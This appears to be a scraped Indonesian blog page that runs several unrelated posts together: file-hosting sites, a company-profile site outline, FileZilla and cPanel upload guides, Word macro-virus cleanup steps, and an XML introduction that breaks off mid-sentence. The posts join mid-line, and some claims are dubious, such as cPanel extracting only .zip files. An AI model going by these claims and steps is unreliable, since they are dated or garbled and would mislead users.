1. Filedropper - sangatmudah pakai. Anda cukup memilih file dan meng-klik "Upload." Kebanyakan situs file hosting gratis hanya memberi anda pilihan untuk upload 100-150MB, Filedropper memungkinkan anda meng-upload sampai dengan 5GB!
2. Fileqube - Fileqube sama seperti situs layanan file hosting lainnya. Ia memiliki desain yang jelas-jelas menunjukan maksudnya. Ia juga sangat cepat. Namun sayangnya Fileqube hanya memungkinkan anda meng-upload sampai dengan 150MB.
3. MyFreeFileHosting - MyFreeFileHosting memiliki tampilan yang mirip dengan MediaFire. Ia memiliki pilihan untuk pengiriman notifikasi email yang dapat memberitahu mereka apa yang akan di-upload, tag untuk mengkategorikan file, dan lainnya. Ukuran file maksimal yang diijinkan adalah 100MB.
4. Fileden - Fileden merupakan situs layanan file hosting yang paling berguna. Pengguna dapat melakukan upload file tanpa memiliki rekening sampai dengan 100MB. Namun jika anda ingin mendaftar, anda akan memiliki tempat penyimpanan sampai dengan tak terhingga, dan bandwith tak terhingga, pilihan untuk menciptakan proyek, kemampuan untuk menggantikan file, statistik file dan statistik proyek.
5. Easyshare - Tidak seperti situs file hosting lainnya, Easyshare membayar pengguna untuk file yang mereka upload. Jika file anda di-unduh sampai 10.000 kali, anda akan mendapatkan 20 dolar.
6. FileFactory - Filefactory memuat banyak sekali iklan jika anda tidak memiliki layanan premium. Namun nama seperti Easyshare, pengguna akan menerima sejulah uang jika file mereka banyak di-unduh oleh pengguna lain.
7. Badongo � Jika anda bukan anggota Badongo anda dapat melakukan upload sampai dengan 4.8GB, jika anda adalah anggota terdaftar, anda dapat upload sampai dengan 12GB dalam satu hari. Membuat web template untuk company profile
Company Profile biasanya memiliki menu sebagai berikut:
- Home
Di bagian home ini bisa berisi:
a. Introduction singkat about us
b. Sedikit pengantar untuk service-service/product-product yang disediakan
c. Daftar dan penjelasan singkat dari News atau events terbaru - About us
Berisi penjelasan tentang company profile
Bisa dibuat dalam submenu:
a. Company Brief
b. Visi Misi
c. Greeting From Director
- Product/Services
Submenunya:
a. Pengantar mengenai Jenis Product
b. Sub product 1
c. Sub Product 2
d. Product yang berkaitan dengan sub product yang aktif - Clients
Daftar client yang memakai product/service company tersebut - Contact Us
Berisi cara-cara menghubungi company tersebut
Sub menu yang mungkin:
a. Form
b. Peta
- News & Events
Berisi kegiatan dari company
Sub menu nya berisi daftar kegiatan-kegiatan company tersebut:
a.kegiatan 5
b.kegiatan 4
c.kegiatan 3
d.kegiatan 2
e.kegiatan 1
Pada bagian sub menu ditambahkan:
a. Search
b. Alamat perusahaan yang bersangkutan
2. Perubahan warna yang dipakai sesuai dengan filosofi perusahaan maupun warna logonya.
Untuk programmingnya, kami buat sedemikian rupa sehingga:
1. Bisa membuat database dan tabel secara otomatis
2. Bisa mengambil content yang dibuat oleh team creative disain ke database
3. CMS(Content Management System) langsung bisa dijalankan untuk mengedit halaman-halaman yang diperlukan
Selain itu, webseite yang kami hasilkan juga bisa disimpan ke dalam CD sehingga bisa dipakai sebagai Company Profile CD atau sebagai presentation tool untuk team sales.
Upload wp-themes dengan FILEZILLA
Bagi para pengguna wordpress, mengganti themes atau template adalah hal yang sangat mudah dan sederhana, tapi kalau belum pernah mengerjakannya memang menjadi PR yang menyulitkan, apalagi bila tidak ada teman yang memberi tahu. Lebih sulit lagi bila seseorang gengsi untuk bertanya sesuatu yang memang belum diketahuinya. Memang benar kata pepatah : Malu bertanya Sesat di jalan.
Pada dasarnya ada dua cara untuk mengupload file ke server, yaitu melalui CPANEL dan FILEZILLA. Perbedaannya adalah, bila kita menggunakan Cpanel kita akan upload file satu demi satu, tentu ini membutuhkan waktu yang lebih lama. Tapi bila kita menggunakan piranti FILEZILLA yang anda bisa free download di Filezilla-project.org akan lebih mudah dan cepat.
Pada kesempatan ini saya akan memberikan ilustrasi bagaimana upload file dengan menggunakan piranti Filezilla tersebut, khususnya upload wp-themes. Sehingga penampilan web kita nanti bisa dirubah dengan wp-themes yang baru. Dengan cara ini pula anda dapat upload file yang lain, misalnya plugin. Begini urutannya :
Buka filezilla, kemudian setelah mengisi bar di atas, address kita isi dengan nama domain anda misalnya : juffan.com, kemudian user kita isi dengan nama id kita dari server misal : juffan01, kemudian password kita isi sesuai dengan password kita masing-masing. Untuk kotak port bisa kita kosongkan. Kemudian tinggal tekan Quickconeck. Setelah menunggu sebentar nanti akan terbuka data di sebelah kanan, yaitu file-file yang ada di server. Lihat gambar 1 (bila ingin jelas gambar di bawah ini silahkan klik gambar ini kemudian pilih full size):
Kemudian kita click folder wp-content seperti terlihat pada gambar di atas, maka akan terbuka folder seperti gambar 2 di bawah ini :
Kemudian kita klik folder themes seperti yang ditunjukkan panah di atas. Kemudian akan terbuka folder themes seperti gambar 3 di bawah ini :
di situ sudah ada beberapa themes yang sudah ada. Kemudian langkah selanjutnya adlah kita buka file wp-themes yang ada di komputer kita, sebagai contoh saya buka fleshdisk kingstone tempat file wp-themes saya simpan, seperti pada gambar di atas. Setelah kita klik keluarlah folder dimana file wp-themes kita simpan seperti gambar 4 di bawah ini,
Kemudian setelah kita dapatkan file wp-themes itu, kita tinggal klik kanan pada file itu dan pilih UPLOAD. Setelah proses transfer file berjalan, maka wp-themes itu sudah berpindah ke server kita. Mudah kan ? Silahkan mencoba.
Cara Upload File ke Web Hosting
1. Siapkan seluruh file yang akan di upload, dan kemudian kita kompres dulu, INGAT!, JANGAN DI KOMPRES DENGAN EKSTENSI SELAIN .ZIP, alasan nya, karena setiap Cpanel webhosting hanya mendukung extract file dengan ekstensi .ZIP, selain dari itu (rar, gz.zip, 7zip dll) tidak akan bisa di extract.
2. Lalu upload lah file yang sudah di extract tadi di public.htm yang ada pada file manager, bila kita mau upload di subdomain tinggal pilih saja subdomain nya, lalu upload seperti biasa.
3. lalu file yang sudah di upload dan dalam keadaan di kompres bisa di extract dulu.
4. Dan untuk menginstal script nya tinggal lihat file “readme.txt” nanti di situ akan ada URL untuk melakukan instalasi nya.
Tutorial ini hanya sampai pada tahap pengupload-an, dan untuk instalasi nya mungkin akan di bahas di artikel yang lain.
NOTE: ada cara lain dalam melakukan proses pengupload-an, yaitu dengan menggunakan ftp, namun ftp ini tidak mutlak di butuhkan, mungkin cara ini (ftp) dilakukan ketika kita upload file web kita pada hosting gratisan seperti 000webhost.com.
Semoga membantu.
Cara Mengatasi Virus Macro
Virus makro sama halnya dengan virus yang ada dalam tubuh manusia, seperti virus TBC. Virus ini meyebar melalui udara dan ketika berada dalam tubuh, maka tubuh akan terganggu fungsinya seperti flu, demam, dan batuk. Begitu juga virus makro.
Jika sebuah komputer terjangkit virus makro, maka sebagian fungsi komputer terhambat (hang) dan timbul kata-kata aneh yang tidak biasa ditampilkan oleh komputer. Jika ditelusuri, bagian virus makro berada pada dokumen (file) dan sebagian lagi berada pada system komputer (software). Oleh karena itu, untuk mengatasi masalah virus macro tidak hanya bergantung pada program anti virus saja. Namun, juga perlu mengetahui apa dan bagaimana cara kerja virus makro tersebut. Telah dipahami bahwa sebagian tubuh virus makro berada pada dokumen dan sebagian lagi berada pada system komputer (software). Untuk itu, langkah pertama yang harus dicoba adalah menghilangkan virus makro yang ada pada system terlebih dahulu. Sebab, virus makro harus dibersihkan dari system komputer. Biasanya sebagian tubuh virus makro yang berada pada system terletak pada file default system yaitu NORMAL.DOT (global template) dan sebagian lagi menggunakan nama file samaran lainnya seperti MANN.DOT, USER.DOT, SNRML.DOT, ETHAN.DOT dan lainnya yang berhubungan dengan nama virus tersebut. File-file ini harus dihilangkan atau dihapus.
Untuk menghilangkan file tersebut ikuti langkah berikut ini.
Anda harus menutup Ms Word atau Ms Excel terlebih dahulu, selanjutnya jika sedang aktif. Ikuti langkah berikut: Start – Find – Files or Folders – ketik pada kolom Named “*.dot” (tanpa tanda petik) – Klik Find Now – hapus File NORMAL.DOT, MANN.DOT atau SNRML.DOT atau ETHAN.DOT dan file-file mencurigakan lainnya. Kemudian buka Ms Word anda kemudian tekan ALT dan F11 secara bersamaan. Jika terbuka aplikasi Microsoft Visual Basic maka system anda sudah bersih dari virus makro. Langkah selanjutnya anda harus memlindungi system dari virus makro yaitu dengan cara: pada aplikasi Microsoft Visual Basic klik Normal (biasanya pada kolom Project disebelah kiri) – klik Tools (pada menu) – Normal Properties. Setelah timbul kotak dialog Tools – Normal Properti klik Protection (sebelah tab general) – Klik check box Lock Project For Viewing – isi Password yang ada kehendaki (berada di bawah 2 kotak ) pada kotak pertama dan kedua diisikan password yang sama (diisi sesuai kehendak anda) – setelah selesai tekan CTRL S bersamaan – tutup applikasi Microsoft Visual Basic – dan tutup aplikasi Ms Word – kemudian buka kembali Ms Word anda dan system anda terproteksi dari virus makro. Namun cara diatas belum selesai karena baru sebagian tubuh virus makro hilang. Bagian yang lainnya berada pada dokumen dan ini juga harus dihilangkan. Untuk cara menghilangkan tubuh virus dalam Dokumen nantikan pada tulisan yang lain.
Apakah XML Itu ?
XML kependekan dari eXtensible Markup Language, dikembangkan mulai tahun 1996 dan mendapatkan pengakuan dari W3C pada bulan Februari 1998. Teknologi yang digunakan pada XML sebenarnya bukan teknologi baru, tapi merupakan turunan dari SGML yang telah dikembangkan pada awal 80-an dan telah banyak digunakan pada dokumentasi teknis proyek-proyek berskala besar. Ketika HTML dikembangkan pada tahun 1990, para penggagas XML mengadopsi bagian paling penting pada SGML dan dengan berpedoman pada pengembangan HTML menghasilkan markup language yang tidak kalah hebatnya dengan SGML.
Seperti halnya HTML, XML juga menggunakan elemen yang ditandai dengan tag pembuka (diawali dengan ‘<’ dan diakhiri dengan ‘>’), tag penutup(diawali dengan ‘’) dan atribut elemen(parameter yang dinyatakan dalam tag pembuka misal
